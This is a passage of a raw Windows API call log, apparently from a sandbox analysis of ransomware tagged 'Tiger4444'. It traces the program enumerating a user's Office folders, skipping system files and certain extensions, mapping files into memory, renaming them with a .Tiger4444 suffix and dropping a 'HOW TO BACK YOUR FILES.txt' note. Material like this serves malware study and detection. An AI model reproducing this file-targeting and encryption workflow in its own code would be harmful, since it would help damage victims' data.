dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSO1033.acl", cAlternateFileName="")) returned 1 [0052.511] lstrcmpiW (lpString1="MSO1033.acl", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.511] lstrcmpiW (lpString1="MSO1033.acl", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.511] lstrcmpiW (lpString1="MSO1033.acl", lpString2="Tiger4444.exe") returned -1 [0052.511] lstrcmpiW (lpString1="MSO1033.acl", lpString2=".") returned 1 [0052.511] lstrcmpiW (lpString1="MSO1033.acl", lpString2="..") returned 1 [0052.511] lstrcmpiW (lpString1="MSO1033.acl", lpString2="windows") returned -1 [0052.511] lstrcmpiW (lpString1="MSO1033.acl", lpString2="bootmgr") returned 1 [0052.511] lstrcmpiW (lpString1="MSO1033.acl", lpString2="pagefile.sys") returned -1 [0052.511] lstrcmpiW (lpString1="MSO1033.acl", lpString2="boot") returned 1 [0052.511] lstrcmpiW (lpString1="MSO1033.acl", lpString2="ids.txt") returned 1 [0052.511] lstrcmpiW (lpString1="MSO1033.acl", lpString2="NTUSER.DAT") returned -1 [0052.511] lstrcpyW (in: lpString1=0x30aeb0a, lpString2="MSO1033.acl" | out: lpString1="MSO1033.acl") returned="MSO1033.acl" [0052.511] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl", dwFileAttributes=0x0) returned 1 [0052.512] lstrlenW (lpString="MSO1033.acl") returned 11 [0052.512] lstrlenW (lpString="Tiger4444") returned 9 [0052.512] lstrcmpiW (lpString1="O1033.acl", lpString2="Tiger4444") returned -1 [0052.512] lstrlenW (lpString=".dll") returned 4 [0052.512] lstrcmpiW (lpString1=".acl", lpString2=".dll") returned -1 [0052.512] lstrlenW (lpString=".lnk") returned 4 [0052.512] lstrcmpiW (lpString1=".acl", lpString2=".lnk") returned -1 [0052.512] lstrlenW (lpString=".ini") returned 4 [0052.512] lstrcmpiW (lpString1=".acl", lpString2=".ini") returned -1 [0052.512] lstrlenW (lpString=".sys") returned 4 [0052.512] lstrcmpiW (lpString1=".acl", lpString2=".sys") returned -1 [0052.512] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\office\\mso1033.acl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0052.512] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0052.512] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14396518132) returned 1 [0052.512] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=37730) returned 1 [0052.512] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc896f8 [0052.512] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0052.512] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9670, lpName=0x0) returned 0x2a4 [0052.513] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9670) returned 0xbe0000 [0052.539] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0052.539] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0052.539] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0052.539] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0052.539] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0052.540] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0052.540] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0052.540] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0052.540] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14399293617) returned 1 [0052.540] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc896f8 | out: hHeap=0xc50000) returned 1 [0052.540] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0052.540] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.540] CloseHandle (hObject=0x2a4) returned 1 [0052.541] CloseHandle (hObject=0x2c8) returned 1 [0052.541] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl.Tiger4444") returned 70 [0052.541] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\office\\mso1033.acl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\office\\mso1033.acl.tiger4444"), dwFlags=0x1) returned 1 [0052.542] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15925c1b, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0xee8b468d, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee8b468d, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0052.542] lstrcmpiW (lpString1="Recent", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.542] lstrcmpiW (lpString1="Recent", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.542] lstrcmpiW (lpString1="Recent", lpString2="Tiger4444.exe") returned -1 [0052.542] lstrcmpiW (lpString1="Recent", lpString2=".") returned 1 [0052.542] lstrcmpiW (lpString1="Recent", lpString2="..") returned 1 [0052.542] lstrcmpiW (lpString1="Recent", lpString2="windows") returned -1 [0052.542] lstrcmpiW (lpString1="Recent", lpString2="bootmgr") returned 1 [0052.542] lstrcmpiW (lpString1="Recent", lpString2="pagefile.sys") returned 1 [0052.542] lstrcmpiW (lpString1="Recent", lpString2="boot") returned 1 [0052.542] lstrcmpiW (lpString1="Recent", lpString2="ids.txt") returned 1 [0052.542] lstrcmpiW (lpString1="Recent", lpString2="NTUSER.DAT") returned 1 [0052.542] lstrcpyW (in: lpString1=0x30aeb0a, lpString2="Recent" | out: lpString1="Recent") returned="Recent" [0052.542] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc91768 [0052.542] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x70) returned 0xc896f8 [0052.542] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc91770 | out: ListHead=0xc66828, ListEntry=0xc91770) returned 0xc66368 [0052.542] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15925c1b, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0xee8b468d, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee8b468d, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 0 [0052.542] FindClose (in: hFindFile=0xc73208 | out: hFindFile=0xc73208) returned 1 [0052.542] lstrcpyW (in: lpString1=0x30aeb0a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.542] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\office\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.543] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.544] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.544] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.545] CloseHandle (hObject=0x2c8) returned 1 [0052.545] CloseHandle (hObject=0x2ac) returned 1 [0052.545] GetCurrentThreadId () returned 0xfa8 [0052.545] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc91770 [0052.545] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent" [0052.545] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc896f8 | out: hHeap=0xc50000) returned 1 [0052.545] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc91768 | out: hHeap=0xc50000) returned 1 [0052.545] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent" [0052.545] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\" [0052.545] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\.BFC0E91B00AE8A0620D3" [0052.545] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\office\\recent\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.564] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.566] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.567] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.567] CloseHandle (hObject=0x2ac) returned 1 [0052.568] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned 55 [0052.568] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.568] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15925c1b, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0xee8b468d, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0x8458f7d3, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73108 [0052.568] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.568] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.568] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.568] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.568] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15925c1b, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0xee8b468d, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0x8458f7d3, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.568] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.568] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.568] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.568] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.568] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.568] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8458f7d3, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8458f7d3, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8458f7d3, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.568] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.568] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.568] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7631bb1a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x764e57d2, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x764e57d2, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="con2.LNK", cAlternateFileName="")) returned 1 [0052.569] lstrcmpiW (lpString1="con2.LNK", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.569] lstrcmpiW (lpString1="con2.LNK", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.569] lstrcmpiW (lpString1="con2.LNK", lpString2="Tiger4444.exe") returned -1 [0052.569] lstrcmpiW (lpString1="con2.LNK", lpString2=".") returned 1 [0052.569] lstrcmpiW (lpString1="con2.LNK", lpString2="..") returned 1 [0052.569] lstrcmpiW (lpString1="con2.LNK", lpString2="windows") returned -1 [0052.569] lstrcmpiW (lpString1="con2.LNK", lpString2="bootmgr") returned 1 [0052.569] lstrcmpiW (lpString1="con2.LNK", lpString2="pagefile.sys") returned -1 [0052.569] lstrcmpiW (lpString1="con2.LNK", lpString2="boot") returned 1 [0052.569] lstrcmpiW (lpString1="con2.LNK", lpString2="ids.txt") returned -1 [0052.569] lstrcmpiW (lpString1="con2.LNK", lpString2="NTUSER.DAT") returned -1 [0052.569] lstrcpyW (in: lpString1=0x30aeb18, lpString2="con2.LNK" | out: lpString1="con2.LNK") returned="con2.LNK" [0052.569] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\con2.LNK", dwFileAttributes=0x0) returned 1 [0052.570] lstrlenW (lpString="con2.LNK") returned 8 [0052.570] lstrlenW (lpString="Tiger4444") returned 9 [0052.570] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0052.570] lstrlenW (lpString=".dll") returned 4 [0052.570] lstrcmpiW (lpString1=".LNK", lpString2=".dll") returned 1 [0052.570] lstrlenW (lpString=".lnk") returned 4 [0052.570] lstrcmpiW (lpString1=".LNK", lpString2=".lnk") returned 0 [0052.570] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f06972b, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x9db38c07, ftLastAccessTime.dwHighDateTime=0x1d3aafb, ftLastWriteTime.dwLowDateTime=0x9db5ee53, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x447, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Database1.LNK", cAlternateFileName="DATABA~1.LNK")) returned 1 [0052.570] lstrcmpiW (lpString1="Database1.LNK", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.570] lstrcmpiW (lpString1="Database1.LNK", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.570] lstrcmpiW (lpString1="Database1.LNK", lpString2="Tiger4444.exe") returned -1 [0052.570] lstrcmpiW (lpString1="Database1.LNK", lpString2=".") returned 1 [0052.570] lstrcmpiW (lpString1="Database1.LNK", lpString2="..") returned 1 [0052.570] lstrcmpiW (lpString1="Database1.LNK", lpString2="windows") returned -1 [0052.570] lstrcmpiW (lpString1="Database1.LNK", lpString2="bootmgr") returned 1 [0052.570] lstrcmpiW (lpString1="Database1.LNK", lpString2="pagefile.sys") returned -1 [0052.570] lstrcmpiW (lpString1="Database1.LNK", lpString2="boot") returned 1 [0052.570] lstrcmpiW (lpString1="Database1.LNK", lpString2="ids.txt") returned -1 [0052.570] lstrcmpiW (lpString1="Database1.LNK", lpString2="NTUSER.DAT") returned -1 [0052.570] lstrcpyW (in: lpString1=0x30aeb18, lpString2="Database1.LNK" | out: lpString1="Database1.LNK") returned="Database1.LNK" [0052.570] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Database1.LNK", dwFileAttributes=0x0) returned 1 [0052.570] lstrlenW (lpString="Database1.LNK") returned 13 [0052.570] lstrlenW (lpString="Tiger4444") returned 9 [0052.570] lstrcmpiW (lpString1="base1.LNK", lpString2="Tiger4444") returned -1 [0052.571] lstrlenW (lpString=".dll") returned 4 [0052.571] lstrcmpiW (lpString1=".LNK", lpString2=".dll") returned 1 [0052.571] lstrlenW (lpString=".lnk") returned 4 [0052.571] lstrcmpiW (lpString1=".LNK", lpString2=".lnk") returned 0 [0052.571] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33a21569, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x33a21569, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x33a477c8, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x3ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents.LNK", cAlternateFileName="DOCUME~1.LNK")) returned 1 [0052.571] lstrcmpiW (lpString1="Documents.LNK", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.571] lstrcmpiW (lpString1="Documents.LNK", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.571] lstrcmpiW (lpString1="Documents.LNK", lpString2="Tiger4444.exe") returned -1 [0052.571] lstrcmpiW (lpString1="Documents.LNK", lpString2=".") returned 1 [0052.571] lstrcmpiW (lpString1="Documents.LNK", lpString2="..") returned 1 [0052.571] lstrcmpiW (lpString1="Documents.LNK", lpString2="windows") returned -1 [0052.571] lstrcmpiW (lpString1="Documents.LNK", lpString2="bootmgr") returned 1 [0052.571] lstrcmpiW (lpString1="Documents.LNK", lpString2="pagefile.sys") returned -1 [0052.571] lstrcmpiW (lpString1="Documents.LNK", lpString2="boot") returned 1 [0052.571] lstrcmpiW (lpString1="Documents.LNK", lpString2="ids.txt") returned -1 [0052.571] lstrcmpiW (lpString1="Documents.LNK", lpString2="NTUSER.DAT") returned -1 [0052.571] lstrcpyW (in: lpString1=0x30aeb18, lpString2="Documents.LNK" | out: lpString1="Documents.LNK") returned="Documents.LNK" [0052.571] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Documents.LNK", dwFileAttributes=0x0) returned 1 [0052.572] lstrlenW (lpString="Documents.LNK") returned 13 [0052.572] lstrlenW (lpString="Tiger4444") returned 9 [0052.572] lstrcmpiW (lpString1="ments.LNK", lpString2="Tiger4444") returned -1 [0052.572] lstrlenW (lpString=".dll") returned 4 [0052.572] lstrcmpiW (lpString1=".LNK", lpString2=".dll") returned 1 [0052.572] lstrlenW (lpString=".lnk") returned 4 [0052.572] lstrcmpiW (lpString1=".LNK", lpString2=".lnk") returned 0 [0052.572] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee8b468d, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee8b468d, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee9bf3e2, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x5cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Global.LNK", cAlternateFileName="")) returned 1 [0052.572] lstrcmpiW (lpString1="Global.LNK", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.572] lstrcmpiW (lpString1="Global.LNK", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.572] lstrcmpiW (lpString1="Global.LNK", lpString2="Tiger4444.exe") returned -1 [0052.572] lstrcmpiW (lpString1="Global.LNK", lpString2=".") returned 1 [0052.572] lstrcmpiW (lpString1="Global.LNK", lpString2="..") returned 1 [0052.572] lstrcmpiW (lpString1="Global.LNK", lpString2="windows") returned -1 [0052.572] lstrcmpiW (lpString1="Global.LNK", lpString2="bootmgr") returned 1 [0052.572] lstrcmpiW (lpString1="Global.LNK", lpString2="pagefile.sys") returned -1 [0052.572] lstrcmpiW (lpString1="Global.LNK", lpString2="boot") returned 1 [0052.572] lstrcmpiW (lpString1="Global.LNK", lpString2="ids.txt") returned -1 [0052.572] lstrcmpiW (lpString1="Global.LNK", lpString2="NTUSER.DAT") returned -1 [0052.572] lstrcpyW (in: lpString1=0x30aeb18, lpString2="Global.LNK" | out: lpString1="Global.LNK") returned="Global.LNK" [0052.572] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK", dwFileAttributes=0x0) returned 1 [0052.573] lstrlenW (lpString="Global.LNK") returned 10 [0052.573] lstrlenW (lpString="Tiger4444") returned 9 [0052.573] lstrcmpiW (lpString1="lobal.LNK", lpString2="Tiger4444") returned -1 [0052.573] lstrlenW (lpString=".dll") returned 4 [0052.573] lstrcmpiW (lpString1=".LNK", lpString2=".dll") returned 1 [0052.573] lstrlenW (lpString=".lnk") returned 4 [0052.573] lstrcmpiW (lpString1=".LNK", lpString2=".lnk") returned 0 [0052.573] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x15a7d124, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x15a7d124, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xee9bf3e2, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x8d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0052.573] lstrcmpiW (lpString1="index.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.573] lstrcmpiW (lpString1="index.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.573] lstrcmpiW (lpString1="index.dat", lpString2="Tiger4444.exe") returned -1 [0052.573] lstrcmpiW (lpString1="index.dat", lpString2=".") returned 1 [0052.573] lstrcmpiW (lpString1="index.dat", lpString2="..") returned 1 [0052.573] lstrcmpiW (lpString1="index.dat", lpString2="windows") returned -1 [0052.573] lstrcmpiW (lpString1="index.dat", lpString2="bootmgr") returned 1 [0052.573] lstrcmpiW (lpString1="index.dat", lpString2="pagefile.sys") returned -1 [0052.573] lstrcmpiW (lpString1="index.dat", lpString2="boot") returned 1 [0052.573] lstrcmpiW (lpString1="index.dat", lpString2="ids.txt") returned 1 [0052.573] lstrcmpiW (lpString1="index.dat", lpString2="NTUSER.DAT") returned -1 [0052.573] lstrcpyW (in: lpString1=0x30aeb18, lpString2="index.dat" | out: lpString1="index.dat") returned="index.dat" [0052.573] lstrlenW (lpString="index.dat") returned 9 [0052.573] lstrlenW (lpString="Tiger4444") returned 9 [0052.573] lstrcmpiW (lpString1="index.dat", lpString2="Tiger4444") returned -1 [0052.573] lstrlenW (lpString=".dll") returned 4 [0052.573] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0052.573] lstrlenW (lpString=".lnk") returned 4 [0052.573] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0052.573] lstrlenW (lpString=".ini") returned 4 [0052.573] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0052.573] lstrlenW (lpString=".sys") returned 4 [0052.574] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0052.574] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0052.574] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0052.574] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14402701856) returned 1 [0052.574] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=141) returned 1 [0052.574] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0052.574] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0052.574] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x2a4 [0052.575] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0xbe0000 [0052.576] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0052.576] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0052.576] HeapFree (in: 